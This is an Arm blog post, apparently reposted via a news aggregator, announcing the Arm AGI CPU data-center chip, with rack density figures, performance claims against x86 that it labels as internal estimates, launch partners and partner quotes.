Every element of the Arm AGI CPU — from operating frequency to memory and I/O architecture — has been designed to support massively parallel, high-performance agentic workloads in a densely populated rack deployment.
Arm’s reference server configuration is a 1OU, 2-node design — packing in two chips with dedicated memory and I/O for a total of 272 cores per blade. These blades are designed to fully populate a standard air-cooled 36kW rack — 30 blades delivering a total of 8160 cores. Arm has additionally partnered with Supermicro on a liquid-cooled 200kW design capable of housing 336 Arm AGI CPUs for over 45,000 cores.
In this configuration, the Arm AGI CPU is capable of delivering more than 2x the performance per rack compared to the latest x86 systems*, achieved through the fundamental advantages of the Arm architecture and careful matching of system resources to compute:
* Arm AGI CPU’s class-leading memory bandwidth means more effective threads of execution per rack; x86 CPUs degrade as cores contend under sustained load.
* High performance, efficient, single-threaded Arm Neoverse V3 CPU cores outperform legacy architectures; every Arm thread does more work.
* More usable threads and more work-per-thread compounds to massive performance gains per rack.
The Arm AGI CPU is already seeing strong commercial momentum with partners at the forefront of scaling agentic AI infrastructure. Planned deployments span accelerator management, agentic orchestration and the densification of services, applications and tools needed for agentic task scale-out — as well as increased networking and data plane compute to support the AI data center.
Meta is our lead partner and customer, co-developing the Arm AGI CPU to optimize gigawatt-scale infrastructure for its Meta family of apps and to work alongside Meta’s own custom MTIA accelerators. Other launch partners include Cerebras, Cloudflare, F5, OpenAI, Positron, Rebellions, SAP, and SK Telecom — each working with Arm on the deployment of the Arm AGI CPU to accelerate AI-driven services across cloud, networking and enterprise environments. Commercial systems are now available for order from ASRockRack, Lenovo and Supermicro.
To accelerate adoption further, Arm is introducing the Arm AGI CPU 1OU Dual Node Reference Server, an Open Compute Project (OCP) DC-MHS standard form factor server. Arm plans to contribute this reference server design and supporting firmware, along with further contributions including system architecture specifications, debug frameworks and diagnostic and verification tooling applicable to all Arm-based systems. Further details will come at the upcoming OCP EMEA Summit.
The launch of Arm AGI CPU represents a new chapter in Arm’s data center journey and continued leadership in computing innovation. As AI reshapes the industry, Arm remains committed to enabling progress across the ecosystem — meeting customers where they are, from hyperscale cloud providers to AI startups.
The Arm AGI CPU is the first offering of Arm’s new data center silicon product line and is available to order now. Follow-on products are committed, targeting best-in-class performance, scale and efficiency. This continues in parallel with the Arm Neoverse CSS product roadmap so that all Arm data center customers move forward together on platform architecture and software compatibility.
Entering this new chapter, our mission remains unchanged: to provide the compute foundation that enables innovation across industries. And the ecosystem is fully behind us: More than 50 leading companies across hyperscale, cloud, silicon, memory, networking, software, system design and manufacturing are supporting the expansion of the Arm compute platform into silicon. With Arm AGI CPU, we are not only defining the architecture of the AI-native data center, we are building it.
Hear more from our Arm AGI CPU deployment partners:
“At Cerebras we build AI infrastructure designed for ultra-fast, large-scale inference, and as this becomes the dominant workload in AI, composable, high-performance systems matter more than ever — these systems need purpose-built AI acceleration alongside efficient, scalable CPUs orchestrating data movement, networking, and coordination at scale. Extending the Arm compute platform into AGI-class infrastructure is a positive step for the ecosystem and for customers deploying AI at global scale.” — Andrew Feldman, CEO, Cerebras
“To continue our mission of helping build a better Internet, Cloudflare needs infrastructure that scales efficiently across our global network. The Arm AGI CPU provides high-performance, energy-efficient compute designed for the next generation of workloads.” — Stephanie Cohen, Chief Strategy Officer, Cloudflare
“Delivering AI experiences at global scale demands a robust and adaptable portfolio of custom silicon solutions, purpose-built to accelerate AI workloads and optimize performance across Meta’s platforms. We worked alongside Arm to develop the Arm AGI CPU to deploy an efficient compute platform that significantly improves our data center performance density and supports a multi-generation roadmap for our evolving AI systems.” — Santosh Janardhan, Head of Infrastructure, Meta
“OpenAI runs AI systems at massive scale. Hundreds of millions use ChatGPT every day, businesses build on our API, and developers rely on tools like Codex. The Arm AGI CPU will play an important role in our infrastructure as we scale, strengthening the orchestration layer that coordinates large scale AI workloads and improving efficiency, performance, and bandwidth across the system.” — Sachin Katti, Head of Industrial Compute at OpenAI
“At Positron, we are focused on purpose-built inference accelerators that delivers breakthrough token generation efficiency using commodity memory. Arm has consistently delivered the industry’s most power-efficient compute platforms, which makes the Arm AGI CPU a natural foundation for next-generation AI infrastructure. By combining Positron’s inference acceleration technology with the energy-efficient Arm AGI CPU platform, we see a powerful opportunity to help data center operators deploy frontier AI models at scale with greater performance per watt and per dollar.” — Mitesh Agrawal, CEO, Positron AI
“High-performance AI systems require tight coordination between general-purpose compute and accelerator architectures. By combining the Arm AGI CPU with Rebellions’ NPUs in new high-density server configurations — we’re delivering a scalable, energy efficient platform that is optimized for AI inference workloads at scale.” — Marshall Choy, Chief Business Officer, Rebellions
“SAP’s successful deployment of SAP HANA on Arm-based AWS Graviton underscores the maturity and performance of the Arm ecosystem for enterprise workloads. The Arm AGI CPU extends that opportunity, providing scalable, efficient compute designed to support the next generation of AI-powered business solutions.” — Stefan Bäuerle, Senior Vice President, Head of HANA & Persistency, SAP
“SK Telecom is expanding into large-scale, full-stack AI inference data center infrastructure, which includes Arm AGI CPU and Rebellions AI accelerator chip. By bringing together our sovereign A. X foundation model with inference-optimized AI servers, we are ready to deliver it to world while elevating our AIDC competitiveness.” — Suk-geun (SG) Chung, CTO and Head of AI CIC, SK Telecom
This blog post contains forward-looking statements regarding Arm’s product roadmap, future performance, planned contributions and partner deployments. These statements are based on current expectations and are subject to risks and uncertainties that could cause actual results to differ materially. For a discussion of factors that could affect Arm’s results, please refer to Arm’s filings with the U. S. Securities and Exchange Commission.
Performance claims are based on Arm internal estimates comparing a fully populated rack of Arm AGI CPU-based servers against comparable x86-based server configurations using industry-standard workloads. Actual results may vary based on system configuration, workload, and other factors.
All product and company names are trademarks or registered trademarks of their respective holders.
...
Read the original on newsroom.arm.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.